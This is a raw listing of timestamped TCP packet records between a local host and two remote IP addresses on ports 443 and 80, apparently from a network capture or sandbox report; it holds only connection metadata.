Sep 4, 2024 17:37:09.901050091 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.901065111 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.901115894 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.901122093 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.901158094 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.901957989 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.901973009 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.902013063 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.902018070 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.902055025 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.902304888 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.902319908 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.902363062 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.902369976 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.902381897 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.906075954 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.910567045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.910578012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.910588026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.910615921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.910636902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.910648108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.910659075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.910665989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.910686016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.910693884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.910734892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.910768986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.911401033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.911433935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.911444902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.911444902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.911462069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.911473036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.911500931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.911511898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.911520004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.911537886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.911550999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.911557913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.911585093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.911623955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912425995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912440062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912447929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912477970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912496090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912528038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912539005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912563086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912626028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912636042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912645102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912655115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912663937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912667990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912684917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912703991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912766933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912777901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912786007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912796021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.912802935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912820101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.912842989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913326979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913337946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913347006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913372040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913388014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913427114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913436890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913445950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913455009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913467884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913480043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913485050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913501024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913521051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913551092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913561106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913569927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913578987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913582087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913590908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913603067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913712978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913723946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913733959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.913755894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.913768053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.914726973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.914737940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.914747953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.914769888 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.914783955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.914855003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.914866924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.914876938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.914887905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.914899111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.914916992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.914926052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916064024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916091919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916105032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916106939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916132927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916141987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916156054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916168928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916177034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916187048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916192055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916199923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916214943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916224003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916233063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916255951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916276932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916285992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916295052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916320086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916330099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916332960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916343927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916352987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916371107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916385889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.916413069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.916450024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.917093992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917136908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.917251110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917267084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917274952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917284966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917299032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.917310953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.917385101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917434931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.917443991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917454004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917463064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.917476892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.917486906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.918574095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.918590069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.918598890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.918612957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.918621063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.918623924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.918641090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.918663025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.918720007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.918732882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.918757915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.918781042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.920011044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.920048952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.920052052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.920063019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.920094967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.920094967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.920177937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.920188904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.920197964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.920208931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.920218945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.920243979 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921168089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921185017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921195984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921211004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921211958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921224117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921231985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921236038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921243906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921258926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921272993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921314001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921766996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921778917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921787977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921807051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921825886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921840906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921850920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921859980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921869040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.921878099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921892881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.921911001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922131062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922142029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922154903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922167063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922172070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922182083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922194004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922202110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922213078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922220945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922243118 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922369003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922390938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922405958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922473907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922516108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922552109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922590971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922631979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922641993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922651052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922672033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922683001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922703028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922713995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.922736883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.922750950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.967587948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967644930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.967652082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967663050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967688084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.967699051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.967757940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967770100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967778921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967788935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967802048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.967828989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.967850924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967885971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.967926979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967967987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967979908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967983961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.967989922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.967998981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968013048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968025923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968030930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968036890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968046904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968058109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968059063 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968069077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968069077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968090057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968110085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968198061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968209982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968223095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968231916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968240023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968241930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.968247890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.968280077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975167990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975204945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975214958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975275040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975287914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975296974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975306988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975316048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975322008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975347996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975367069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975404978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975436926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975447893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975451946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975475073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975537062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975548029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975555897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975581884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975590944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975644112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975653887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975661993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975672007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975677013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975703955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975717068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975795984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975805044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975814104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975822926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975835085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975841045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975848913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975857019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975863934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975864887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975881100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975883007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975893021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975895882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975904942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.975914001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975927114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975939035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.975971937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976011038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976027012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976069927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976126909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976136923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976145983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976166964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976177931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976325989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976336956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976346970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976356030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976366997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976372004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976377964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976382017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976389885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976399899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976399899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976418972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976430893 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976438046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976449013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976458073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976466894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976469994 CEST	49717	80	192.168.2.6	147.45.44.104
